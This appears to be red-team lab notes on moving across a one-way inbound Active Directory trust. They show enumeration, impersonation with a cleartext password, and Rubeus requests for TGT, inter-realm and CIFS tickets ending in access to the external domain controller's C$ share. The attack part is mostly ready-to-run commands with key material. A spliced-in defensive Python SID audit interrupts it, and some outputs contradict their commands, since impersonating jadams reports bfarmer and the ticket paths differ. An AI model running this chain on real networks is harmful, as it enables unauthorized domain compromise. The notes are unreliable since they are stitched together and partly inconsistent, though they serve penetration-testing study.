# One Way (Inbound)

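**dev.cyberbotic.io** has a one-way inbound trust with **subsidiary.external**: subsidiary.external trusts dev.cyberbotic.io, so principals in dev.cyberbotic.io can be granted access to resources in subsidiary.external.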

```
beacon> powershell Get-DomainTrust

SourceName      : dev.cyberbotic.io
TargetName      : subsidiary.external
TrustType       : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : 
TrustDirection  : Inbound
WhenCreated     : 2/19/2021 10:50:56 PM
WhenChanged     : 2/19/2021 10:50:56 PM
```

```
beacon> powershell Get-DomainComputer -Domain subsidiary.external -Properties DNSHostName

dnshostname           
-----------           
ad.subsidiary.external

SharpHound -c DcOnly -d subsidiary.external
```

Enumerate foreign group members (principals from another domain that are members of groups in subsidiary.external)

```
beacon> powershell Get-DomainForeignGroupMember -Domain subsidiary.external

beacon> powershell ConvertFrom-SID S-1-5-21-3263068140-2042698922-2891547269-1133
DEV\Subsidiary Admins
```


```
# Validate the previous finding by listing local group members on the external DC
beacon> powershell Get-NetLocalGroupMember -ComputerName ad.subsidiary.external

ComputerName : ad.subsidiary.external
GroupName    : Administrators
MemberName   : DEV\Subsidiary Admins
SID          : S-1-5-21-3263068140-2042698922-2891547269-1133
IsGroup      : True
IsDomain     : True
```
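The same membership data from the defender's side, as an added example that is not part of the original notes: an audit that flags group members whose SID was issued by another domain, so that cross-trust grants like `DEV\Subsidiary Admins` in `Administrators` are reviewed. The function name, the privileged-group list, the sample memberships and the placeholder domain SID for subsidiary.external are assumptions; only the DEV SID comes from the output above.

```python
import re

# Only account-domain SIDs (S-1-5-21-<three sub-authorities>-<RID>) carry a
# domain identifier; well-known SIDs such as S-1-5-11 do not and are skipped.
DOMAIN_SID = re.compile(r"^(S-1-5-21-\d+-\d+-\d+)-(\d+)$")

# Assumption: groups whose foreign members should be reviewed first.
PRIVILEGED = {"Administrators", "Domain Admins", "Enterprise Admins"}


def foreign_members(local_domain_sid, memberships, trusted_domains):
    """Return memberships whose member SID was issued by another domain."""
    findings = []
    for group, member_sid in memberships:
        match = DOMAIN_SID.match(member_sid)
        if not match:
            continue  # well-known or malformed SID, not a cross-trust principal
        issuer, rid = match.group(1), int(match.group(2))
        if issuer == local_domain_sid:
            continue  # issued by the audited domain itself
        findings.append({
            "group": group,
            "sid": member_sid,
            "rid": rid,
            "issuer": trusted_domains.get(issuer, "UNKNOWN"),
            "privileged": group in PRIVILEGED,
        })
    # Privileged groups first, then alphabetical by group name.
    return sorted(findings, key=lambda f: (not f["privileged"], f["group"]))


# Constructed sample data. LOCAL_SID is a placeholder for the domain SID of
# subsidiary.external, which the page does not show.
LOCAL_SID = "S-1-5-21-1111111111-2222222222-3333333333"
TRUSTED = {"S-1-5-21-3263068140-2042698922-2891547269": "DEV"}
MEMBERSHIPS = [
    ("Administrators", LOCAL_SID + "-500"),
    ("Administrators", LOCAL_SID + "-512"),
    ("Administrators", "S-1-5-21-3263068140-2042698922-2891547269-1133"),
    ("Users", "S-1-5-11"),
    ("Users", LOCAL_SID + "-513"),
]

if __name__ == "__main__":
    for f in foreign_members(LOCAL_SID, MEMBERSHIPS, TRUSTED):
        flag = "PRIVILEGED" if f["privileged"] else "review"
        print(f'{flag}: {f["group"]} <- {f["issuer"]} RID {f["rid"]} ({f["sid"]})')
```

A foreign issuer that resolves to `UNKNOWN` means the SID belongs to a domain that is not in the list of expected trusts and should be investigated before the privileged entries are accepted.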

Authenticate using domain username and password

```
beacon> powershell Get-DomainGroupMember -Identity "Subsidiary Admins" | select MemberName

MemberName
----------
jadams

beacon> make_token DEV\jadams TrustNo1
[+] Impersonated DEV\bfarmer

beacon> ls \\ad.subsidiary.external\c$
```

Authenticate using Kerberos tickets

```
# Request a TGT from the current domain
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Debug\Rubeus.exe asktgt /user:jadams /domain:dev.cyberbotic.io /aes256:70a673fa756d60241bd74ca64498701dbb0ef9c5fa3a93fe4918910691647d80 /opsec /nowrap
```

```
# Use the TGT to request an inter-realm (referral) ticket for the external domain from the current domain's DC
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Debug\Rubeus.exe asktgs /service:krbtgt/subsidiary.external /domain:dev.cyberbotic.io /dc:dc-2.dev.cyberbotic.io /ticket:doIFdD[...snip...]MuSU8= /nowrap
```

```
# Use the inter-realm ticket to request a service ticket (TGS) from the external domain's DC
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Debug\Rubeus.exe asktgs /service:cifs/ad.subsidiary.external /domain:ad.subsidiary.external /dc:ad.subsidiary.external /ticket:doIFMT[...snip...]5BTA== /nowrap
```

```
# Decode the base64 ticket and save it as a .kirbi file
PS C:\> [System.IO.File]::WriteAllBytes("C:\Users\Administrator\Desktop\subsidiary.kirbi", [System.Convert]::FromBase64String("doIFiD [...snip...] 5hbA=="))

beacon> make_token DEV\jadams FakePass
[+] Impersonated DEV\bfarmer

beacon> kerberos_ticket_use C:\Users\Daniel\Desktop\subsidiary.kirbi
beacon> ls \\ad.subsidiary.external\c$

beacon> rev2self
```

